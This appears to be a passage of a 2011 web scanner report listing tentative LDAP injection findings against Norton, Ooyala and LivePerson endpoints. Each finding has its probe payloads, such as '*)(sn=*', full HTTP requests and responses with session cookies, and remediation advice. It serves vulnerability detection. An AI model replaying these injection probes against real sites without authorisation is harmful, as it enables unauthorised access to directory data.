LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action. Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
1.1. https://onlinefamily.norton.com/familysafety/basicpremium.fs [REST URL parameter 2]
next
Summary
Severity:
High
Confidence:
Tentative
Host:
https://onlinefamily.norton.com
Path:
/familysafety/basicpremium.fs
Issue detail
The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks. The payloads 2e38829777b43edb)(sn=* and 2e38829777b43edb)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /familysafety/2e38829777b43edb)(sn=* HTTP/1.1 Host: onlinefamily.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:45:51 GMT Server: Apache Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:51 GMT; Path=/ Set-Cookie: JSESSIONID=C2C885DF4F91960B21A89E36D3D5E6F7; Path=/familysafety Content-Length: 1420 Content-Type: text/html;charset=UTF-8 Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>Norton Online Family</title> <link rel="shortcut icon" type="image/x-icon" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/favicon.ico" /> <link rel="stylesheet" type="text/css" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/css/norton-family-safety.css" /> <style type="text/css"> h2 { font-size:32px; } p { font-size:15px; } h2,p { margin:1.2em 0; } #wrap { width:1000px; min-height:480px; *height:480px; margin:0 auto; background: url(https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/buddy_crossingGuard.gif) no-repeat 0 100px; } </style> <script type="text/javascript"> if(window.parent.location != document.location) { window.parent.location = document.location; } </script> </head> <body> <div id="wrap"> <div style="padding:150px 0 0 360px;"> <h2>Sorry, this page is not found.</h2> <p>The page you are looking for might have been removed or is temporarily unavailable.</p> <p><a href="javascript:history.go(-1);">Click here to go back to the previous page</a></p> </div> </div> </body> </html>
Request 2
GET /familysafety/2e38829777b43edb)!(sn=* HTTP/1.1 Host: onlinefamily.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:45:52 GMT Server: Apache Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:52 GMT; Path=/ Content-Length: 1420 Content-Type: text/html;charset=UTF-8 Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>Norton Online Family</title> <link rel="shortcut icon" type="image/x-icon" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/favicon.ico" /> <link rel="stylesheet" type="text/css" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/css/norton-family-safety.css" /> <style type="text/css"> h2 { font-size:32px; } p { font-size:15px; } h2,p { margin:1.2em 0; } #wrap { width:1000px; min-height:480px; *height:480px; margin:0 auto; background: url(https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/buddy_crossingGuard.gif) no-repeat 0 100px; } </style> <script type="text/javascript"> if(window.parent.location != document.location) { window.parent.location = document.location; } </script> </head> <body> <div id="wrap"> <div style="padding:150px 0 0 360px;"> <h2>Sorry, this page is not found.</h2> <p>The page you are looking for might have been removed or is temporarily unavailable.</p> <p><a href="javascript:history.go(-1);">Click here to go back to the previous page</a></p> </div> </div> </body> </html>
1.2. http://player.ooyala.com/player.js [height parameter]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://player.ooyala.com
Path:
/player.js
Issue detail
The height parameter appears to be vulnerable to LDAP injection attacks. The payloads *)(sn=* and *)!(sn=* were each submitted in the height parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /player.js?width=356&height=*)(sn=* &embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response 1
HTTP/1.1 200 OK Last-Modified: Fri, 09 Sep 2011 21:26:25 GMT Content-Type: text/javascript; charset=utf-8 X-Ooyala-Server-Id: i-2b01f44a X-Pad: avoid browser bug Content-Length: 25976 Cache-Control: private, max-age=300 Date: Fri, 09 Sep 2011 21:26:26 GMT Connection: close Vary: Accept-Encoding (function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f...[SNIP]... ="iphone";}if(H){L="ipad";}if(C){L="android";}var P="http://player.ooyala.com/mobile_player.js?embedCodes=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&expires=1315641600&height=0&locale=en-US&playerId=ooyalaPlayer434126523_10kbk3a&rootItemEmbedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&signature=bdlRvCl0lGMCXqu1NQ3yMjViV6g03sK3MpF9NIg4Jgw&video_pcode=w1c2U6fqVnqafrMhiALawYi9UUck&width=356&wmode=transparent&device="+L;var e={getCurrentEmbedScript:function(){if(window.ooyalaActiveScript){return window.ooyalaActiveScript;}var i=document.getElementsByTagName("script");return i[i.length-1];},getQueryStringParams:function(U){if(U===null){return{};}var Z=U.split("?",2);var Y={};if(Z.length===2){var aa=Z[1].split("&");var W;for(W=0;W<aa.length;++W){var T=aa[W].indexOf("=");if(T>=1){var V=aa[W].substring(0,T);var X=aa[W].substring(T+1,aa[W].length);Y[V]=X;}}}return Y;},getThruParamQueryString:function(V){var U;if(V===null){return"";}var T=[];var i=/^thruParam_(.*)/;for(U in V){if(V.hasOwnProperty(U)&&i.test(U)){T.push(U+"="+V[U]);}}return T.join("&");},gup:function(U,T){if(U===null){return"";}T=T.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var i="[\\?&]"+T+"=([^&#]*)";var W=new RegExp(i);var V=W.exec(U);if(V===null){return"";}else{return V[1];}},createContainerDiv:function(V,U,i,T){var W=document.createElement("div");W.style.width=U+"px";W.style.height=i+"px";W.style.overflow="hidden";W.setAttribute("id",V);if(T){W.setAttribute("class",T);}return W;},replaceElement:function(i,V,U){var X=i?document.getElementById(i):null;if(X){X.innerHTML="";X.appendChild(U);}else{if(document.body){if(typeof(V.parentNode.insertBefore)==="function"){V.parentNode.insertBefore(U,V);}else{var W="containerDiv"+new Date().getTime();document.write("<div id='"+W+"'></div>");var T=document.getElementById(W);T.appendChild(U);}}else{document.write("<body></body>");document.body.appendChild(U);}}},loadScript:function(U,W){var i=document.createElement("script");i.type="text/javascript";i.src=U;if(W){i.onload=W;}var V=null;var T=window.document.getElementsByTagName("head");if(T){V=T[0];}else{V=window.document.childNodes[0].childNodes[0]||window.document.childNodes[0];}if(V){V.appendChild(i);}return i;},mergeObjects:func...[SNIP]...
Request 2
GET /player.js?width=356&height=*)!(sn=* &embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response 2
HTTP/1.1 200 OK Last-Modified: Fri, 09 Sep 2011 21:26:26 GMT Content-Type: text/javascript; charset=utf-8 X-Ooyala-Server-Id: i-cfd6a4a3 X-Pad: avoid browser bug Content-Length: 26000 Cache-Control: private, max-age=300 Date: Fri, 09 Sep 2011 21:26:27 GMT Connection: close Vary: Accept-Encoding (function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f...[SNIP]... ="iphone";}if(H){L="ipad";}if(C){L="android";}var P="http://player.ooyala.com/mobile_player.js?embedCodes=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&expires=1315641600&height=0&locale=en-US&playerId=ooyalaPlayer723342756_10kbk3b&rootItemEmbedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&signature=qy1TVnNRkIaAk3DIEJXYxG8EmEV0w4W9%2BQyBYG%2BD2tQ&video_pcode=w1c2U6fqVnqafrMhiALawYi9UUck&width=356&wmode=transparent&device="+L;var e={getCurrentEmbedScript:function(){if(window.ooyalaActiveScript){return window.ooyalaActiveScript;}var i=document.getElementsByTagName("script");return i[i.length-1];},getQueryStringParams:function(U){if(U===null){return{};}var Z=U.split("?",2);var Y={};if(Z.length===2){var aa=Z[1].split("&");var W;for(W=0;W<aa.length;++W){var T=aa[W].indexOf("=");if(T>=1){var V=aa[W].substring(0,T);var X=aa[W].substring(T+1,aa[W].length);Y[V]=X;}}}return Y;},getThruParamQueryString:function(V){var U;if(V===null){return"";}var T=[];var i=/^thruParam_(.*)/;for(U in V){if(V.hasOwnProperty(U)&&i.test(U)){T.push(U+"="+V[U]);}}return T.join("&");},gup:function(U,T){if(U===null){return"";}T=T.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var i="[\\?&]"+T+"=([^&#]*)";var W=new RegExp(i);var V=W.exec(U);if(V===null){return"";}else{return V[1];}},createContainerDiv:function(V,U,i,T){var W=document.createElement("div");W.style.width=U+"px";W.style.height=i+"px";W.style.overflow="hidden";W.setAttribute("id",V);if(T){W.setAttribute("class",T);}return W;},replaceElement:function(i,V,U){var X=i?document.getElementById(i):null;if(X){X.innerHTML="";X.appendChild(U);}else{if(document.body){if(typeof(V.parentNode.insertBefore)==="function"){V.parentNode.insertBefore(U,V);}else{var W="containerDiv"+new Date().getTime();document.write("<div id='"+W+"'></div>");var T=document.getElementById(W);T.appendChild(U);}}else{document.write("<body></body>");document.body.appendChild(U);}}},loadScript:function(U,W){var i=document.createElement("script");i.type="text/javascript";i.src=U;if(W){i.onload=W;}var V=null;var T=window.document.getElementsByTagName("head");if(T){V=T[0];}else{V=window.document.childNodes[0].childNodes[0]||window.document.childNodes[0];}if(V){V.appendChild(i);}return i;},mergeObjects:...[SNIP]...
1.3. http://sales.liveperson.net/hc/2735064/ [PV%21pageLoadTime parameter]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://sales.liveperson.net
Path:
/hc/2735064/
Issue detail
The PV%21pageLoadTime parameter appears to be vulnerable to LDAP injection attacks. The payloads *)(sn=* and *)!(sn=* were each submitted in the PV%21pageLoadTime parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=772257181582-563438479788&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=*)(sn=* &PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:35:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:35:11 GMT; path=/hc/2735064; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:35:11 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({"ResultSet": {"lpCallId":"772257181582-563438479788","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
Request 2
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=772257181582-563438479788&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=*)!(sn=* &PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:35:12 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:35:12 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({"ResultSet": {"lpCallId":"772257181582-563438479788","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
1.4. http://sales.liveperson.net/hc/2735064/ [SV%21language parameter]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://sales.liveperson.net
Path:
/hc/2735064/
Issue detail
The SV%21language parameter appears to be vulnerable to LDAP injection attacks. The payloads cee83379ee2249f6)(sn=* and cee83379ee2249f6)!(sn=* were each submitted in the SV%21language parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=729815930360-803452320629&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Aupgrades%20%26%20renewals%3Aupgraderenewal&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=cee83379ee2249f6)(sn=* &SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=CFE83898-5BB0-075A-37F1-7545D477147F&SV%21partner=store%3Asymantec&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603886325
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; expires=Sat, 08-Sep-2012 21:36:08 GMT; path=/hc/2735064; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:36:08 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({"ResultSet": {"lpCallId":"729815930360-803452320629","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
Request 2
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=729815930360-803452320629&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Aupgrades%20%26%20renewals%3Aupgraderenewal&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=cee83379ee2249f6)!(sn=* &SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=CFE83898-5BB0-075A-37F1-7545D477147F&SV%21partner=store%3Asymantec&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603886325
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:09 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:36:09 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({"ResultSet": {"lpCallId":"729815930360-803452320629","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
1.5. http://sales.liveperson.net/hc/2735064/ [defInvite parameter]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://sales.liveperson.net
Path:
/hc/2735064/
Issue detail
The defInvite parameter appears to be vulnerable to LDAP injection attacks. The payloads 23e555a7c9acdf94)(sn=* and 23e555a7c9acdf94)!(sn=* were each submitted in the defInvite parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/2735064/?&site=2735064&cmd=mTagInviteTimeout&lpCallId=243824564852-218836609740&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=23e555a7c9acdf94)(sn=* &activePlugin=none&cobrowse=true&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&timeout=120&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315604066248
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:37:49 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:37:49 GMT Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:1315604196:-1:-1; expires=Sat, 08-Sep-2012 21:37:49 GMT; path=/hc/2735064; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 427 lpConnLib.Process({"ResultSet": {"lpCallId":"243824564852-218836609740","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
Request 2
GET /hc/2735064/?&site=2735064&cmd=mTagInviteTimeout&lpCallId=243824564852-218836609740&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=23e555a7c9acdf94)!(sn=* &activePlugin=none&cobrowse=true&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&timeout=120&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315604066248
Response 2
